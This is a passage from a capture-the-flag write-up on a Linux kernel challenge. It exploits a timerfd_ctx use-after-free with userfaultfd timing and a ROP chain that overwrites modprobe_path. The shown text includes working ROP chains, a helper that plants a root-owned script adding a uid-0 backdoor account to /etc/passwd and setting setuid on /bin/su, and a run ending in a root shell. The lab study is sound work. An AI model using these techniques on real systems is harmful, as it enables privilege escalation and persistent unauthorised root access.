00d0 0x0000000000000000 0x0000000000000000
00e0 0x0000000000000000 0x0000000000000000
[+] Leaked timerfd_ctx structure address: 0xffff88800029b800
[+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
[+] Kernel base address: 0xffffffff00000000
[*] Mmapping page...
[*] Start monitoring range: 0xdead000 - 0xdeae000
[*] Triggering page fault...
[+] Page fault at address 0xdead000!
[*] Freeing...
[*] Creating second timer...
[*] Structure will be overwritten with:
0000 0x000000000cafe800 0x0000000000000000
0010 0x0000000000000000 0x000000000eae0e65
0020 0x000000000eae0e65 0xffffffff81027b86
0030 0xffffffff8183e080 0x0000000000000000
0040 0x0000000000000000 0x0000000000000000
0050 0x0000000000000000 0x0000000000000000
0060 0x0000000000000000 0x0000000000000000
0070 0x0000000000000000 0x0000000000000000
0080 0xbd7ad3bf6c2aae81 0xffff88800029b888
0090 0xffff88800029b888 0x0000000000000000
00a0 0x0000000000000000 0xffff888000157600
00b0 0x00000000000000a8 0x0000000000000000
00c0 0x0000000000000000 0x0000000000000000
00d0 0x0000000000000000 0x0000000000000000
00e0 0x0000000000000000 0x0000000000000000
CUCTF{TEST} // [1]
BUG: unable to handle page fault for address: 00000001034cc473
#PF: supervisor instruction fetch in kernel mode
[...]
The kernel crashed, but we successfully read the flag [1]. Cool, but it’s not enough. We want a shell!
Initially I tried to replace the read_flag()
function with:
static void execve_shell(void)
{
if (getuid() != 0)
{
puts("[ERROR] We are not root!");
exit(1);
}
puts("[+] We are root!");
execve("/bin/sh", 0, 0);
}
Unfortunately, I could not get it to work, but after spending some time experimenting, I found and alternative approach to get a shell.
First, we need to fix the timerfd_ctx
structure we corrupted in
the previous steps. I replaced the first address with the
original timerfd_ctx
address and the sixth address,
(now overwritten by the stack pivot gadget) with:
0xffffffff810001dc: ret;
So when the function pointer will be called again, the call will simply return.
// Fix idx 0x0
*rop ++= kernel_base + 0xffffffff81027b8eUL; // mov rax, rdi; ret;
*rop ++= kernel_base + 0xffffffff8106e24aUL; // mov rsi, rax; sub rsi, rcx; cmp rdx, rax; cmovs r8, rsi; mov rax, r8; ret;
*rop ++= kernel_base + 0xffffffff81027b8eUL; // mov rax, rdi; ret;
*rop ++= kernel_base + 0xffffffff810f6180UL; // mov qword ptr [rax], rsi; ret;
// Fix idx 0x5
*rop ++= kernel_base + 0xffffffff8113f9b6UL; // pop rdx; ret;
*rop ++= 0x28;
*rop ++= kernel_base + 0xffffffff81012183UL; // add rax, rdx; ret;
*rop ++= kernel_base + 0xffffffff81005b00UL; // pop rsi; ret;
*rop ++= kernel_base + 0xffffffff810001dcUL; // ret;
*rop ++= kernel_base + 0xffffffff810f6180UL; // mov qword ptr [rax], rsi; ret;
Even after these changes, I could not use execve/execveat etc so I opted for a different strategy.
In Linux, when a user executes a program with an unknown program header,
the system calls
__request_module
that in turn calls
call_modprobe. call_modprobe()
utilizes
call_usermodehelper_exec
to execute the program specified by
modprobe_path.
modprobe_path
, set by default to /sbin/morprobe
.
If we overwrite modprobe_path
with the location
of a malicious program, for example
/home/user/x
, every time a file with an
unknown program header is executed, the system will run our script with root privileges.
We can use the following function to automatically create a file with an
unknown program header, /home/user/asd
, and a
script that will add a new user /home/user/x
.
void prepare_exploit()
{
system("echo -e '\xdd\xdd\xdd\xdd\xdd\xdd' > /home/user/asd");
system("chmod +x /home/user/asd");
system("echo '#!/bin/sh' > /home/user/x");
system("echo 'chmod +s /bin/su' >> /home/user/x");
system("echo 'echo \"asd:12prjwbMKCxIE:0:0:asd:/root:/bin/sh\" >> /etc/passwd' >> /home/user/x");
system("chmod +x /home/user/x");
}
Now we can modify the ROP chain to overwrite modprobe_path
using a write-what-where gadget:
// Hijack modprobe_path
*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0x73752f656d6f682f; // su/emoh/
*rop ++= kernel_base + 0xffffffff81005b00UL; // pop rsi; ret;
*rop ++= kernel_base + 0xffffffff81837c20UL; // modprobe_path
*rop ++= kernel_base + 0xffffffff810a5417UL; // mov qword ptr [rsi], rdi; ret;
*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0x782f7265; // x/re
*rop ++= kernel_base + 0xffffffff81005b00UL; // pop rsi; ret;
*rop ++= kernel_base + 0xffffffff81837c20UL + 8UL; // modprobe_path
*rop ++= kernel_base + 0xffffffff810a5417UL; // mov qword ptr [rsi], rdi; ret;
Now we only need to find a way to prevent the kernel from crashing after returning to user space. Surprisingly I was able to restore execution with this function:
static void do_nothing(void) { return; }
This way, after hijacking modprobe_path
, our exploit will successfully
exit and we will be able to execute /home/user/asd
to force the kernel executing our malicious script:
I also tried to trap the thread with int3
and it worked too.
// pkc -> cc -> kpti trampoline -> user space -> ret
*rop ++= kernel_base + 0xffffffff810b689dUL; // pop rdi; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff81053680UL; // pkc
*rop ++= kernel_base + 0xffffffff8108bacaUL; // mov rdi, rax; call 0x2d1350; mov rax, -9; pop rbp; ret;
*rop ++= 0;
*rop ++= kernel_base + 0xffffffff810537d0UL; // cc
*rop ++= kernel_base + 0xffffffff8118a8d3UL; // pop rcx; ret;
*rop ++= (unsigned long)(do_nothing); // return
*rop ++= kernel_base + 0xffffffff81008b7dUL; // pop r11; pop r12; pop rbp; ret;
*rop ++= usr_rflags;
*rop ++= 0; // r12
*rop ++= 0; // rbp
*rop ++= kernel_base + 0xffffffff81200106UL; // kpti_trampoline (sysret)
*rop ++= 0; // rax
*rop ++= 0; // rdi
*rop ++= (unsigned long)(fake_stack + 0x1000); // rsp
It is worth noting that to maximize the exploit success rate, we need
perfect timing. I found the right compromise using
sleep(1)
before ioctl_userfaultfd()
. Why is it needed? Well, no clue, I still have to dig deeply.
This will be our final exploit: exploit.c, utils.h
/ $ /home/user/exploit
[*] Allocating/Freeing timerfd_ctx structure...
[*] Leaking timerfd_tmrproc address...
[+] Object dump:
0000 0xffff88800029b600 0x0000000000000000
0010 0x0000000000000000 0x00000002dc1b84cb
0020 0x00000002dc1b84cb 0xffffffff81102a00
0030 0xffffffff8183e080 0x0000000000000000
0040 0x0000000000000000 0x0000000000000000
0050 0x0000000000000000 0x0000000000000000
0060 0x0000000000000000 0x0000000000000000
0070 0x0000000000000000 0x0000000000000000
0080 0xbd74d3bf6c2aaa81 0xffff88800029b688
0090 0xffff88800029b688 0x0000000000000000
00a0 0x0000000000000000 0xffff888000157f00
00b0 0x00000000000000a8 0x0000000000000000
00c0 0x0000000000000000 0x0000000000000000
00d0 0x0000000000000000 0x0000000000000000
00e0 0x0000000000000000 0x0000000000000000
[+] Leaked timerfd_ctx structure address: 0xffff88800029b600
[+] Leaked timerfd_tmrproc address: 0xffffffff81102a00
[+] Kernel base address: 0xffffffff00000000
[+] Modprobe path address: 0xffffffff81837c20
[*] Mmapping page...
[*] Start monitoring range: 0xdead000 - 0xdeae000
[*] Triggering page fault...
[+] Page fault at address 0xdead000!
[*] Freeing...
[*] Creating second timer...
[*] Structure will be overwritten with:
0000 0x000000000cafe800 0x0000000000000000
0010 0x0000000000000000 0x000000000eae0e65
0020 0x000000000eae0e65 0xffffffff81027b86
0030 0xffffffff8183e080 0x0000000000000000
0040 0x0000000000000000 0x0000000000000000
0050 0x0000000000000000 0x0000000000000000
0060 0x0000000000000000 0x0000000000000000
0070 0x0000000000000000 0x0000000000000000
0080 0xbd74d3bf6c2aaa81 0xffff88800029b688
0090 0xffff88800029b688 0x0000000000000000
00a0 0x0000000000000000 0xffff888000157f00
00b0 0x00000000000000a8 0x0000000000000000
00c0 0x0000000000000000 0x0000000000000000
00d0 0x0000000000000000 0x0000000000000000
00e0 0x0000000000000000 0x0000000000000000
[*] Fake stack at: 0xcafe000
[+] Execute: "/home/user/asd" to add a new user: asd / asdasdasd
/ $ cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
user:x:1000:1000:Linux User,,,:/home/user:/bin/sh
/ $ /home/user/asd
/home/user/asd: line 1: ������: not found
/ $ cat /etc/passwd
root:x:0:0:root:/root:/bin/sh
user:x:1000:1000:Linux User,,,:/home/user:/bin/sh
asd:12prjwbMKCxIE:0:0:asd:/root:/bin/sh
/ $ su asd
Password:
/ # id
uid=0(root) gid=0(root) groups=0(root)
/ #
Finally, we can enjoy our root shell!
The challenge can be found here: here.
References
SMEP
KPTI
- https://www.cs.hs-rm.de/~kaiser/events/wamos2018/Slides/mueller.pdf (n. 15)
- https://www.kernel.org/doc/html/latest/x86/pti.html
Misc devices
- https://www.linuxjournal.com/article/2920
- https://linux-kernel-labs.github.io/refs/heads/master/labs/device_drivers.html
Slab allocator
- https://www.kernel.org/doc/gorman/html/understand/understand011.html
- https://hammertux.github.io/slab-allocator
- https://argp.github.io/2012/01/03/linux-kernel-heap-exploitation/
timerfd_ctx
- https://ptr-yudai.hatenablog.com/entry/2020/03/16/165628
- https://rpis.ec/blog/tokyowesterns-2019-gnote/
Userfaultfd
- https://blog.lizzie.io/using-userfaultfd.html
- https://makedist.com/posts/2016/10/10/measuring-userfaultfd-page-fault-latency/
Exploit diagram
modprobe_path